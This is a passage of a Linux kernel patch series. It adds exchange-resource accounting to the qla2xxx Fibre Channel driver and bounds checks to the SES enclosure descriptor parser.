+-		if (qla2x00_fabric_login(vha, fcport, &nextlid)) {
++		if (atomic_read(&fcport->state) != FCS_ONLINE) {
+ 			ql_dbg(ql_dbg_user, vha, 0x7003,
+-			    "Failed to login port %06X for ELS passthru.\n",
++			    "Port %06X is not online for ELS passthru.\n",
+ 			    fcport->d_id.b24);
+ 			rval = -EIO;
+ 			goto done;
+@@ -348,6 +348,7 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 			goto done;
+ 		}
+ 
++		qla_port_allocated = 1;
+ 		/* Initialize all required  fields of fcport */
+ 		fcport->vha = vha;
+ 		fcport->d_id.b.al_pa =
+@@ -432,7 +433,7 @@ done_unmap_sg:
+ 	goto done_free_fcport;
+ 
+ done_free_fcport:
+-	if (bsg_request->msgcode != FC_BSG_RPT_ELS)
++	if (qla_port_allocated)
+ 		qla2x00_free_fcport(fcport);
+ done:
+ 	return rval;
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index a26a373be9da3..cd4eb11b07079 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -660,7 +660,7 @@ enum {
+ 
+ struct iocb_resource {
+ 	u8 res_type;
+-	u8 pad;
++	u8  exch_cnt;
+ 	u16 iocb_cnt;
+ };
+ 
+@@ -3721,6 +3721,10 @@ struct qla_fw_resources {
+ 	u16 iocbs_limit;
+ 	u16 iocbs_qp_limit;
+ 	u16 iocbs_used;
++	u16 exch_total;
++	u16 exch_limit;
++	u16 exch_used;
++	u16 pad;
+ };
+ 
+ #define QLA_IOCB_PCT_LIMIT 95
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index 777808af56347..1925cc6897b68 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -235,7 +235,7 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 	uint16_t mb[MAX_IOCB_MB_REG];
+ 	int rc;
+ 	struct qla_hw_data *ha = vha->hw;
+-	u16 iocbs_used, i;
++	u16 iocbs_used, i, exch_used;
+ 
+ 	rc = qla24xx_res_count_wait(vha, mb, SIZEOF_IOCB_MB_REG);
+ 	if (rc != QLA_SUCCESS) {
+@@ -263,13 +263,19 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 	if (ql2xenforce_iocb_limit) {
+ 		/* lock is not require. It's an estimate. */
+ 		iocbs_used = ha->base_qpair->fwres.iocbs_used;
++		exch_used = ha->base_qpair->fwres.exch_used;
+ 		for (i = 0; i < ha->max_qpairs; i++) {
+-			if (ha->queue_pair_map[i])
++			if (ha->queue_pair_map[i]) {
+ 				iocbs_used += ha->queue_pair_map[i]->fwres.iocbs_used;
++				exch_used += ha->queue_pair_map[i]->fwres.exch_used;
++			}
+ 		}
+ 
+ 		seq_printf(s, "Driver: estimate iocb used [%d] high water limit [%d]\n",
+ 			   iocbs_used, ha->base_qpair->fwres.iocbs_limit);
++
++		seq_printf(s, "estimate exchange used[%d] high water limit [%d] n",
++			   exch_used, ha->base_qpair->fwres.exch_limit);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/scsi/qla2xxx/qla_edif.c b/drivers/scsi/qla2xxx/qla_edif.c
+index e4240aae5f9e3..38d5bda1f2748 100644
+--- a/drivers/scsi/qla2xxx/qla_edif.c
++++ b/drivers/scsi/qla2xxx/qla_edif.c
+@@ -925,7 +925,9 @@ qla_edif_app_getfcinfo(scsi_qla_host_t *vha, struct bsg_job *bsg_job)
+ 			if (!(fcport->flags & FCF_FCSP_DEVICE))
+ 				continue;
+ 
+-			tdid = app_req.remote_pid;
++			tdid.b.domain = app_req.remote_pid.domain;
++			tdid.b.area = app_req.remote_pid.area;
++			tdid.b.al_pa = app_req.remote_pid.al_pa;
+ 
+ 			ql_dbg(ql_dbg_edif, vha, 0x2058,
+ 			    "APP request entry - portid=%06x.\n", tdid.b24);
+@@ -2989,9 +2991,10 @@ qla28xx_start_scsi_edif(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -3185,7 +3188,7 @@ queuing_error:
+ 		mempool_free(sp->u.scmd.ct6_ctx, ha->ctx_mempool);
+ 		sp->u.scmd.ct6_ctx = NULL;
+ 	}
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+diff --git a/drivers/scsi/qla2xxx/qla_edif_bsg.h b/drivers/scsi/qla2xxx/qla_edif_bsg.h
+index 0931f4e4e127a..514c265ba86e2 100644
+--- a/drivers/scsi/qla2xxx/qla_edif_bsg.h
++++ b/drivers/scsi/qla2xxx/qla_edif_bsg.h
+@@ -89,7 +89,20 @@ struct app_plogi_reply {
+ struct app_pinfo_req {
+ 	struct app_id app_info;
+ 	uint8_t	 num_ports;
+-	port_id_t remote_pid;
++	struct {
++#ifdef __BIG_ENDIAN
++		uint8_t domain;
++		uint8_t area;
++		uint8_t al_pa;
++#elif defined(__LITTLE_ENDIAN)
++		uint8_t al_pa;
++		uint8_t area;
++		uint8_t domain;
++#else
++#error "__BIG_ENDIAN or __LITTLE_ENDIAN must be defined!"
++#endif
++		uint8_t rsvd_1;
++	} remote_pid;
+ 	uint8_t		version;
+ 	uint8_t		pad[VND_CMD_PAD_SIZE];
+ 	uint8_t		reserved[VND_CMD_APP_RESERVED_SIZE];
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 8d9ecabb1aac1..8f2a968793913 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -128,12 +128,14 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 		    sp->cmd_sp)) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
+ 			cmdsp_found = 1;
++			qla_put_fw_resources(qpair, &sp->cmd_sp->iores);
+ 		}
+ 
+ 		/* removing the abort */
+ 		if (qpair->req->outstanding_cmds[handle] == sp) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
+ 			sp_found = 1;
++			qla_put_fw_resources(qpair, &sp->iores);
+ 			break;
+ 		}
+ 	}
+@@ -2000,6 +2002,7 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 		for (h = 1; h < sp->qpair->req->num_outstanding_cmds; h++) {
+ 			if (sp->qpair->req->outstanding_cmds[h] == sp) {
+ 				sp->qpair->req->outstanding_cmds[h] = NULL;
++				qla_put_fw_resources(sp->qpair, &sp->iores);
+ 				break;
+ 			}
+ 		}
+@@ -2073,7 +2076,6 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ done_free_sp:
+ 	/* ref: INIT */
+ 	kref_put(&sp->cmd_kref, qla2x00_sp_release);
+-	fcport->flags &= ~FCF_ASYNC_SENT;
+ done:
+ 	return rval;
+ }
+@@ -3943,6 +3945,12 @@ void qla_init_iocb_limit(scsi_qla_host_t *vha)
+ 	ha->base_qpair->fwres.iocbs_limit = limit;
+ 	ha->base_qpair->fwres.iocbs_qp_limit = limit / num_qps;
+ 	ha->base_qpair->fwres.iocbs_used = 0;
++
++	ha->base_qpair->fwres.exch_total = ha->orig_fw_xcb_count;
++	ha->base_qpair->fwres.exch_limit = (ha->orig_fw_xcb_count *
++					    QLA_IOCB_PCT_LIMIT) / 100;
++	ha->base_qpair->fwres.exch_used  = 0;
++
+ 	for (i = 0; i < ha->max_qpairs; i++) {
+ 		if (ha->queue_pair_map[i])  {
+ 			ha->queue_pair_map[i]->fwres.iocbs_total =
+@@ -3951,6 +3959,10 @@ void qla_init_iocb_limit(scsi_qla_host_t *vha)
+ 			ha->queue_pair_map[i]->fwres.iocbs_qp_limit =
+ 				limit / num_qps;
+ 			ha->queue_pair_map[i]->fwres.iocbs_used = 0;
++			ha->queue_pair_map[i]->fwres.exch_total = ha->orig_fw_xcb_count;
++			ha->queue_pair_map[i]->fwres.exch_limit =
++				(ha->orig_fw_xcb_count * QLA_IOCB_PCT_LIMIT) / 100;
++			ha->queue_pair_map[i]->fwres.exch_used = 0;
+ 		}
+ 	}
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index 5185dc5daf80d..b0ee307b5d4b9 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -380,24 +380,26 @@ qla2xxx_get_fc4_priority(struct scsi_qla_host *vha)
+ 
+ enum {
+ 	RESOURCE_NONE,
+-	RESOURCE_INI,
++	RESOURCE_IOCB = BIT_0,
++	RESOURCE_EXCH = BIT_1,  /* exchange */
++	RESOURCE_FORCE = BIT_2,
+ };
+ 
+ static inline int
+-qla_get_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
++qla_get_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+ 	u16 iocbs_used, i;
++	u16 exch_used;
+ 	struct qla_hw_data *ha = qp->vha->hw;
+ 
+ 	if (!ql2xenforce_iocb_limit) {
+ 		iores->res_type = RESOURCE_NONE;
+ 		return 0;
+ 	}
++	if (iores->res_type & RESOURCE_FORCE)
++		goto force;
+ 
+-	if ((iores->iocb_cnt + qp->fwres.iocbs_used) < qp->fwres.iocbs_qp_limit) {
+-		qp->fwres.iocbs_used += iores->iocb_cnt;
+-		return 0;
+-	} else {
++	if ((iores->iocb_cnt + qp->fwres.iocbs_used) >= qp->fwres.iocbs_qp_limit) {
+ 		/* no need to acquire qpair lock. It's just rough calculation */
+ 		iocbs_used = ha->base_qpair->fwres.iocbs_used;
+ 		for (i = 0; i < ha->max_qpairs; i++) {
+@@ -405,30 +407,49 @@ qla_get_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
+ 				iocbs_used += ha->queue_pair_map[i]->fwres.iocbs_used;
+ 		}
+ 
+-		if ((iores->iocb_cnt + iocbs_used) < qp->fwres.iocbs_limit) {
+-			qp->fwres.iocbs_used += iores->iocb_cnt;
+-			return 0;
+-		} else {
++		if ((iores->iocb_cnt + iocbs_used) >= qp->fwres.iocbs_limit) {
++			iores->res_type = RESOURCE_NONE;
++			return -ENOSPC;
++		}
++	}
++
++	if (iores->res_type & RESOURCE_EXCH) {
++		exch_used = ha->base_qpair->fwres.exch_used;
++		for (i = 0; i < ha->max_qpairs; i++) {
++			if (ha->queue_pair_map[i])
++				exch_used += ha->queue_pair_map[i]->fwres.exch_used;
++		}
++
++		if ((exch_used + iores->exch_cnt) >= qp->fwres.exch_limit) {
+ 			iores->res_type = RESOURCE_NONE;
+ 			return -ENOSPC;
+ 		}
+ 	}
++force:
++	qp->fwres.iocbs_used += iores->iocb_cnt;
++	qp->fwres.exch_used += iores->exch_cnt;
++	return 0;
+ }
+ 
+ static inline void
+-qla_put_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
++qla_put_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+-	switch (iores->res_type) {
+-	case RESOURCE_NONE:
+-		break;
+-	default:
++	if (iores->res_type & RESOURCE_IOCB) {
+ 		if (qp->fwres.iocbs_used >= iores->iocb_cnt) {
+ 			qp->fwres.iocbs_used -= iores->iocb_cnt;
+ 		} else {
+-			// should not happen
++			/* should not happen */
+ 			qp->fwres.iocbs_used = 0;
+ 		}
+-		break;
++	}
++
++	if (iores->res_type & RESOURCE_EXCH) {
++		if (qp->fwres.exch_used >= iores->exch_cnt) {
++			qp->fwres.exch_used -= iores->exch_cnt;
++		} else {
++			/* should not happen */
++			qp->fwres.exch_used = 0;
++		}
+ 	}
+ 	iores->res_type = RESOURCE_NONE;
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index 42ce4e1fe7441..4f48f098ea5a6 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -1589,9 +1589,10 @@ qla24xx_start_scsi(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -1678,7 +1679,7 @@ queuing_error:
+ 	if (tot_dsds)
+ 		scsi_dma_unmap(cmd);
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -1793,9 +1794,10 @@ qla24xx_dif_start_scsi(srb_t *sp)
+ 	tot_prot_dsds = nseg;
+ 	tot_dsds += nseg;
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -1883,7 +1885,7 @@ queuing_error:
+ 	}
+ 	/* Cleanup will be performed by the caller (queuecommand) */
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -1952,9 +1954,10 @@ qla2xxx_start_scsi_mq(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -2041,7 +2044,7 @@ queuing_error:
+ 	if (tot_dsds)
+ 		scsi_dma_unmap(cmd);
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -2171,9 +2174,10 @@ qla2xxx_dif_start_scsi_mq(srb_t *sp)
+ 	tot_prot_dsds = nseg;
+ 	tot_dsds += nseg;
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -2260,7 +2264,7 @@ queuing_error:
+ 	}
+ 	/* Cleanup will be performed by the caller (queuecommand) */
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -3813,6 +3817,65 @@ qla24xx_prlo_iocb(srb_t *sp, struct logio_entry_24xx *logio)
+ 	logio->vp_index = sp->fcport->vha->vp_idx;
+ }
+ 
++int qla_get_iocbs_resource(struct srb *sp)
++{
++	bool get_exch;
++	bool push_it_through = false;
++
++	if (!ql2xenforce_iocb_limit) {
++		sp->iores.res_type = RESOURCE_NONE;
++		return 0;
++	}
++	sp->iores.res_type = RESOURCE_NONE;
++
++	switch (sp->type) {
++	case SRB_TM_CMD:
++	case SRB_PRLI_CMD:
++	case SRB_ADISC_CMD:
++		push_it_through = true;
++		fallthrough;
++	case SRB_LOGIN_CMD:
++	case SRB_ELS_CMD_RPT:
++	case SRB_ELS_CMD_HST:
++	case SRB_ELS_CMD_HST_NOLOGIN:
++	case SRB_CT_CMD:
++	case SRB_NVME_LS:
++	case SRB_ELS_DCMD:
++		get_exch = true;
++		break;
++
++	case SRB_FXIOCB_DCMD:
++	case SRB_FXIOCB_BCMD:
++		sp->iores.res_type = RESOURCE_NONE;
++		return 0;
++
++	case SRB_SA_UPDATE:
++	case SRB_SA_REPLACE:
++	case SRB_MB_IOCB:
++	case SRB_ABT_CMD:
++	case SRB_NACK_PLOGI:
++	case SRB_NACK_PRLI:
++	case SRB_NACK_LOGO:
++	case SRB_LOGOUT_CMD:
++	case SRB_CTRL_VP:
++		push_it_through = true;
++		fallthrough;
++	default:
++		get_exch = false;
++	}
++
++	sp->iores.res_type |= RESOURCE_IOCB;
++	sp->iores.iocb_cnt = 1;
++	if (get_exch) {
++		sp->iores.res_type |= RESOURCE_EXCH;
++		sp->iores.exch_cnt = 1;
++	}
++	if (push_it_through)
++		sp->iores.res_type |= RESOURCE_FORCE;
++
++	return qla_get_fw_resources(sp->qpair, &sp->iores);
++}
++
+ int
+ qla2x00_start_sp(srb_t *sp)
+ {
+@@ -3827,6 +3890,12 @@ qla2x00_start_sp(srb_t *sp)
+ 		return -EIO;
+ 
+ 	spin_lock_irqsave(qp->qp_lock_ptr, flags);
++	rval = qla_get_iocbs_resource(sp);
++	if (rval) {
++		spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
++		return -EAGAIN;
++	}
++
+ 	pkt = __qla2x00_alloc_iocbs(sp->qpair, sp);
+ 	if (!pkt) {
+ 		rval = EAGAIN;
+@@ -3927,6 +3996,8 @@ qla2x00_start_sp(srb_t *sp)
+ 	wmb();
+ 	qla2x00_start_iocbs(vha, qp->req);
+ done:
++	if (rval)
++		qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
+ 	return rval;
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index e19fde304e5c6..cbbd7014da939 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -3112,6 +3112,7 @@ qla25xx_process_bidir_status_iocb(scsi_qla_host_t *vha, void *pkt,
+ 	}
+ 	bsg_reply->reply_payload_rcv_len = 0;
+ 
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ done:
+ 	/* Return the vendor specific reply to API */
+ 	bsg_reply->reply_data.vendor_reply.vendor_rsp[0] = rval;
+@@ -3197,7 +3198,7 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 		}
+ 		return;
+ 	}
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 
+ 	if (sp->cmd_type != TYPE_SRB) {
+ 		req->outstanding_cmds[handle] = NULL;
+@@ -3362,8 +3363,6 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 				       "Dropped frame(s) detected (0x%x of 0x%x bytes).\n",
+ 				       resid, scsi_bufflen(cp));
+ 
+-				vha->interface_err_cnt++;
+-
+ 				res = DID_ERROR << 16 | lscsi_status;
+ 				goto check_scsi_status;
+ 			}
+@@ -3618,7 +3617,6 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 	default:
+ 		sp = qla2x00_get_sp_from_handle(vha, func, req, pkt);
+ 		if (sp) {
+-			qla_put_iocbs(sp->qpair, &sp->iores);
+ 			sp->done(sp, res);
+ 			return 0;
+ 		}
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index 02fdeb0d31ec4..c57e02a355219 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -170,18 +170,6 @@ out:
+ 	qla2xxx_rel_qpair_sp(sp->qpair, sp);
+ }
+ 
+-static void qla_nvme_ls_unmap(struct srb *sp, struct nvmefc_ls_req *fd)
+-{
+-	if (sp->flags & SRB_DMA_VALID) {
+-		struct srb_iocb *nvme = &sp->u.iocb_cmd;
+-		struct qla_hw_data *ha = sp->fcport->vha->hw;
+-
+-		dma_unmap_single(&ha->pdev->dev, nvme->u.nvme.cmd_dma,
+-				 fd->rqstlen, DMA_TO_DEVICE);
+-		sp->flags &= ~SRB_DMA_VALID;
+-	}
+-}
+-
+ static void qla_nvme_release_ls_cmd_kref(struct kref *kref)
+ {
+ 	struct srb *sp = container_of(kref, struct srb, cmd_kref);
+@@ -199,7 +187,6 @@ static void qla_nvme_release_ls_cmd_kref(struct kref *kref)
+ 
+ 	fd = priv->fd;
+ 
+-	qla_nvme_ls_unmap(sp, fd);
+ 	fd->done(fd, priv->comp_status);
+ out:
+ 	qla2x00_rel_sp(sp);
+@@ -365,13 +352,10 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 	nvme->u.nvme.rsp_len = fd->rsplen;
+ 	nvme->u.nvme.rsp_dma = fd->rspdma;
+ 	nvme->u.nvme.timeout_sec = fd->timeout;
+-	nvme->u.nvme.cmd_dma = dma_map_single(&ha->pdev->dev, fd->rqstaddr,
+-	    fd->rqstlen, DMA_TO_DEVICE);
++	nvme->u.nvme.cmd_dma = fd->rqstdma;
+ 	dma_sync_single_for_device(&ha->pdev->dev, nvme->u.nvme.cmd_dma,
+ 	    fd->rqstlen, DMA_TO_DEVICE);
+ 
+-	sp->flags |= SRB_DMA_VALID;
+-
+ 	rval = qla2x00_start_sp(sp);
+ 	if (rval != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x700e,
+@@ -379,7 +363,6 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 		wake_up(&sp->nvme_ls_waitq);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+-		qla_nvme_ls_unmap(sp, fd);
+ 		qla2x00_rel_sp(sp);
+ 		return rval;
+ 	}
+@@ -445,13 +428,24 @@ static inline int qla2x00_start_nvme_mq(srb_t *sp)
+ 		goto queuing_error;
+ 	}
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
++
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
++	sp->iores.iocb_cnt = req_cnt;
++	if (qla_get_fw_resources(sp->qpair, &sp->iores)) {
++		rval = -EBUSY;
++		goto queuing_error;
++	}
++
+ 	if (req->cnt < (req_cnt + 2)) {
+ 		if (IS_SHADOW_REG_CAPABLE(ha)) {
+ 			cnt = *req->out_ptr;
+ 		} else {
+ 			cnt = rd_reg_dword_relaxed(req->req_q_out);
+-			if (qla2x00_check_reg16_for_disconnect(vha, cnt))
++			if (qla2x00_check_reg16_for_disconnect(vha, cnt)) {
++				rval = -EBUSY;
+ 				goto queuing_error;
++			}
+ 		}
+ 
+ 		if (req->ring_index < cnt)
+@@ -600,6 +594,8 @@ static inline int qla2x00_start_nvme_mq(srb_t *sp)
+ 		qla24xx_process_response_queue(vha, rsp);
+ 
+ queuing_error:
++	if (rval)
++		qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return rval;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 7fb28c207ee50..2d86f804872bf 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -7094,9 +7094,12 @@ qla2x00_do_dpc(void *data)
+ 			}
+ 		}
+ loop_resync_check:
+-		if (test_and_clear_bit(LOOP_RESYNC_NEEDED,
++		if (!qla2x00_reset_active(base_vha) &&
++		    test_and_clear_bit(LOOP_RESYNC_NEEDED,
+ 		    &base_vha->dpc_flags)) {
+-
++			/*
++			 * Allow abort_isp to complete before moving on to scanning.
++			 */
+ 			ql_dbg(ql_dbg_dpc, base_vha, 0x400f,
+ 			    "Loop resync scheduled.\n");
+ 
+@@ -7447,7 +7450,7 @@ qla2x00_timer(struct timer_list *t)
+ 
+ 		/* if the loop has been down for 4 minutes, reinit adapter */
+ 		if (atomic_dec_and_test(&vha->loop_down_timer) != 0) {
+-			if (!(vha->device_flags & DFLG_NO_CABLE)) {
++			if (!(vha->device_flags & DFLG_NO_CABLE) && !vha->vp_idx) {
+ 				ql_log(ql_log_warn, vha, 0x6009,
+ 				    "Loop down - aborting ISP.\n");
+ 
+diff --git a/drivers/scsi/ses.c b/drivers/scsi/ses.c
+index 0a1734f34587d..1707d6d144d21 100644
+--- a/drivers/scsi/ses.c
++++ b/drivers/scsi/ses.c
+@@ -433,8 +433,8 @@ int ses_match_host(struct enclosure_device *edev, void *data)
+ }
+ #endif  /*  0  */
+ 
+-static void ses_process_descriptor(struct enclosure_component *ecomp,
+-				   unsigned char *desc)
++static int ses_process_descriptor(struct enclosure_component *ecomp,
++				   unsigned char *desc, int max_desc_len)
+ {
+ 	int eip = desc[0] & 0x10;
+ 	int invalid = desc[0] & 0x80;
+@@ -445,22 +445,32 @@ static void ses_process_descriptor(struct enclosure_component *ecomp,
+ 	unsigned char *d;
+ 
+ 	if (invalid)
+-		return;
++		return 0;
+ 
+ 	switch (proto) {
+ 	case SCSI_PROTOCOL_FCP:
+ 		if (eip) {
++			if (max_desc_len <= 7)
++				return 1;
+ 			d = desc + 4;
+ 			slot = d[3];
+ 		}
+ 		break;
+ 	case SCSI_PROTOCOL_SAS:
++
+ 		if (eip) {
++			if (max_desc_len <= 27)
++				return 1;
+ 			d = desc + 4;
+ 			slot = d[3];
+ 			d = desc + 8;
+-		} else
++		} else {
++			if (max_desc_len <= 23)
++				return 1;
+ 			d = desc + 4;
++		}
++
++
+ 		/* only take the phy0 addr */
+ 		addr = (u64)d[12] << 56 |
+ 			(u64)d[13] << 48 |
+@@ -477,6 +487,8 @@ static void ses_process_descriptor(struct enclosure_component *ecomp,
+ 	}
+ 	ecomp->slot = slot;
+ 	scomp->addr = addr;
++
++	return 0;
+ }
+ 
+ struct efd {
+@@ -549,7 +561,7 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 		/* skip past overall descriptor */
+ 		desc_ptr += len + 4;
+ 	}
+-	if (ses_dev->page10)
++	if (ses_dev->page10 && ses_dev->page10_len > 9)
+ 		addl_desc_ptr = ses_dev->page10 + 8;
+ 	type_ptr = ses_dev->page1_types;
+ 	components = 0;
+@@ -557,17 +569,22 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 		for (j = 0; j < type_ptr[1]; j++) {
+ 			char *name = NULL;
+ 			struct enclosure_component *ecomp;
++			int max_desc_len;
+ 
+ 			if (desc_ptr) {
+-				if (desc_ptr >= buf + page7_len) {
++				if (desc_ptr + 3 >= buf + page7_len) {
+ 					desc_ptr = NULL;
+ 				} else {
+ 					len = (desc_ptr[2] << 8) + desc_ptr[3];
+ 					desc_ptr += 4;
+-					/* Add trailing zero - pushes into
+-					 * reserved space */
+-					desc_ptr[len] = '\0';
+-					name = desc_ptr;
++					if (desc_ptr + len > buf + page7_len)
++						desc_ptr = NULL;
++					else {
++						/* Add trailing zero - pushes into
++						 * reserved space */
++						desc_ptr[len] = '\0';
++						name = desc_ptr;
++					}
+ 				}
+ 			}
+ 			if (type_ptr[0] == ENCLOSURE_COMPONENT_DEVICE ||
+@@ -583,10 +600,14 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 					ecomp = &edev->component[components++];
+ 
+ 				if (!IS_ERR(ecomp)) {
+-					if (addl_desc_ptr)
+-						ses_process_descriptor(
+-							ecomp,
+-							addl_desc_ptr);
++					if (addl_desc_ptr) {
++						max_desc_len = ses_dev->page10_len -
++						    (addl_desc_ptr - ses_dev->page10);
++						if (ses_process_descriptor(ecomp,
++						    addl_desc_ptr,
++						    max_desc_len))
++							addl_desc_ptr = NULL;
++					}
+ 					if (create)
+ 						enclosure_component_register(
+ 							ecomp);
+@@ -603,9 +624,11 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 			     /* these elements are optional */
+ 			     type_ptr[0] == ENCLOSURE_COMPONENT_SCSI_TARGET_PORT ||
+ 			     type_ptr[0] == ENCLOSURE_COMPONENT_SCSI_INITIATOR_PORT ||
+-			     type_ptr[0] == ENCLOSURE_COMPONENT_CONTROLLER_ELECTRONICS))
